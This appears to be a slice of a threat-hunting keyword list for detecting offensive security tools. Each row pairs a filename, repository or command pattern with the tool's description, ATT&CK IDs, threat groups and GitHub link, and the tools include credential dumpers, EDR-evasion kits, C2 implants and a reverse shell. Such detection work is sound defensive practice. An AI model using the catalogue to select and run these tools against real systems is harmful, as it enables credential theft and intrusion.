T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/alfarom256/BOF-ForeignLsass,1,1,N/A,10,10,96,25,2021-08-23T16:57:08Z,2021-08-21T00:19:29Z -*foreign_lsass.x86*,offensive_tool_keyword,cobaltstrike,LSASS Dumping With Foreign Handles,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/alfarom256/BOF-ForeignLsass,1,1,N/A,10,10,96,25,2021-08-23T16:57:08Z,2021-08-21T00:19:29Z -*forge_ticket.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*forge_ticket_spec.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ForgeCert.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*ForgeCert-main*,offensive_tool_keyword,ForgeCert,ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.,T1553.002 - T1136.003 - T1059.001,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/GhostPack/ForgeCert,1,1,N/A,10,6,538,87,2022-10-07T18:18:09Z,2021-06-09T22:04:18Z -*forkatz.exe*,offensive_tool_keyword,forkatz,credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege,T1003.002 - T1558.002 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/Barbarisch/forkatz,1,1,N/A,10,2,122,15,2021-05-22T00:23:04Z,2021-05-21T18:42:22Z -*forkatz.sln*,offensive_tool_keyword,forkatz,credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege,T1003.002 - T1558.002 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/Barbarisch/forkatz,1,1,N/A,10,2,122,15,2021-05-22T00:23:04Z,2021-05-21T18:42:22Z -*forkatz.vcxproj*,offensive_tool_keyword,forkatz,credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege,T1003.002 - T1558.002 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/Barbarisch/forkatz,1,1,N/A,10,2,122,15,2021-05-22T00:23:04Z,2021-05-21T18:42:22Z -*forkatz-main*,offensive_tool_keyword,forkatz,credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege,T1003.002 - T1558.002 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/Barbarisch/forkatz,1,1,N/A,10,2,122,15,2021-05-22T00:23:04Z,2021-05-21T18:42:22Z -*-format=dotnet-createsection -sleep*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*--format-string ziiiiizzzb * ,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -*--format-string ziiiiizzzib *,offensive_tool_keyword,cobaltstrike,InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/InlineExecute-Assembly,1,0,N/A,10,10,490,114,2023-07-22T23:25:15Z,2021-07-08T17:40:07Z -*fortalice/bofhound*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*fortra/impacket*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*FortyNorthSecurity*,offensive_tool_keyword,Github Username,FortyNorth Security is a computer security consultancy specializing in offensive security work. We regularly perform red team assessments. pen tests. and more,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/FortyNorthSecurity,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*FortyNorthSecurity/CIMplant*,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,1,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*FortyNorthSecurity/FunctionalC2*,offensive_tool_keyword,FunctionalC2,A small POC of using Azure Functions to relay communications,T1021.006 - T1132.002 - T1071.001,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/FortyNorthSecurity/FunctionalC2,1,1,N/A,10,10,58,15,2023-03-30T20:27:38Z,2020-03-12T17:54:50Z -*found-passwords.txt*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*FourEye(shellcode_bypass*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,0,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*FourEye-main*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,1,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*fox-it/adconnectdump*,offensive_tool_keyword,adconnectdump,Dump Azure AD Connect credentials for Azure AD and Active Directory,T1003.004 - T1059.001 - T1082,TA0006 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/fox-it/adconnectdump,1,1,N/A,10,6,506,84,2023-08-21T00:00:08Z,2019-04-09T07:41:42Z -*fox-it/BloodHound*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*foxlox/hypobrychium*,offensive_tool_keyword,hypobrychium,hypobrychium AV/EDR Bypass,T1562.001 - T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/foxlox/hypobrychium,1,1,N/A,8,1,72,21,2023-07-21T21:13:20Z,2023-07-18T09:55:07Z -*fpc -c Seatbelt*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*FrameManagementAssociationRequest.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*FrameManagementDeauthentication.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*FrameManagementProbeRequest.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*FrameManagementReassociationResponse.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*framework/obfuscation/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*framework-114634acb84f8baa.js*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*Framework-MobSF*,offensive_tool_keyword,Mobile-Security-Framework-MobSF,Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF support mobile app binaries (APK. XAPK. IPA & APPX) along with zipped source code and provides REST APIs for seamless integration with your CI/CD or DevSecOps pipeline.The Dynamic Analyzer helps you to perform runtime security assessment and interactive instrumented testing.,T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523,TA0007 - TA0010 - TA0003,N/A,N/A,Frameworks,https://github.com/MobSF/Mobile-Security-Framework-MobSF,1,1,N/A,N/A,10,14942,3006,2023-10-03T20:48:09Z,2015-01-31T04:36:01Z -*frampton.py*,offensive_tool_keyword,frampton,PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible,T1055 - T1548.002 - T1129 - T1001,TA0002 - TA0003- TA0004 -TA0011,N/A,N/A,POST Exploitation tools,https://github.com/ins1gn1a/Frampton,1,1,N/A,N/A,1,69,16,2019-11-24T22:34:48Z,2019-10-29T00:22:14Z -*freenas_reverse_root_shell_csrf*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*Freeze_*_darwin_amd64*,offensive_tool_keyword,Freeze,Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods,T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze,1,1,N/A,N/A,10,1333,166,2023-08-18T17:25:07Z,2022-09-21T14:40:59Z -*Freeze_*_linux_amd64*,offensive_tool_keyword,Freeze,Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods,T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze,1,1,N/A,N/A,10,1333,166,2023-08-18T17:25:07Z,2022-09-21T14:40:59Z -*Freeze-rs -*,offensive_tool_keyword,Freeze.rs,Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST,T1548.004,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze.rs,1,0,N/A,N/A,7,665,70,2023-08-18T17:26:44Z,2023-05-03T16:04:47Z -*Freeze-rs.exe*,offensive_tool_keyword,Freeze.rs,Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST,T1548.004,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze.rs,1,1,N/A,N/A,7,665,70,2023-08-18T17:26:44Z,2023-05-03T16:04:47Z -*Freeze-rs_darwin_amd64*,offensive_tool_keyword,Freeze.rs,Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST,T1548.004,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze.rs,1,1,N/A,N/A,7,665,70,2023-08-18T17:26:44Z,2023-05-03T16:04:47Z -*Freeze-rs_linux_amd64*,offensive_tool_keyword,Freeze.rs,Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST,T1548.004,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze.rs,1,1,N/A,N/A,7,665,70,2023-08-18T17:26:44Z,2023-05-03T16:04:47Z -*Freeze-rs_windows_amd64.exe*,offensive_tool_keyword,Freeze.rs,Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST,T1548.004,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze.rs,1,1,N/A,N/A,7,665,70,2023-08-18T17:26:44Z,2023-05-03T16:04:47Z -*frida -l disableRoot.js -f owasp.mstg.uncrackable1*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*frida-ps -U*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*frida-trace -x ntdll.dll -i * -p *,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*frkngksl/NimExec*,offensive_tool_keyword,NimExec,Fileless Command Execution for Lateral Movement in Nim,T1021.006 - T1059.005 - T1564.001,TA0008 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/frkngksl/NimExec,1,1,N/A,N/A,4,307,33,2023-06-23T11:07:20Z,2023-04-21T19:46:53Z -*from .core import Fuzzer*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*from .wfuzz import *,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*from bofhound import *,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*from bofhound.ad import*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*from burp import *,offensive_tool_keyword,ActiveScanPlusPlus,ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/albinowax/ActiveScanPlusPlus,1,0,N/A,N/A,6,568,192,2022-11-15T13:47:31Z,2014-06-23T10:04:13Z -*from burp import*,offensive_tool_keyword,secretfinder,SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files,T1083 - T1081 - T1113,TA0003 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/m4ll0k/SecretFinder,1,0,N/A,N/A,10,1524,324,2023-06-13T00:49:58Z,2020-06-08T10:50:12Z -*from Exrop import *,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,0,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z -*from helpers.*_smbserver * import SimpleSMBServer*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*from holehe.core import*,offensive_tool_keyword,holehe,holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.,T1598.004 - T1592.002 - T1598.001,TA0003 - TA0009,N/A,N/A,Reconnaissance,https://github.com/megadose/holehe,1,0,N/A,6,10,5659,655,2023-09-15T21:14:10Z,2020-06-25T23:03:02Z -*from merlin import *,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,0,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -*from pwn import *,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,0,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z -*from rarce import exploit*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,0,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*from shellcodes import *,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an 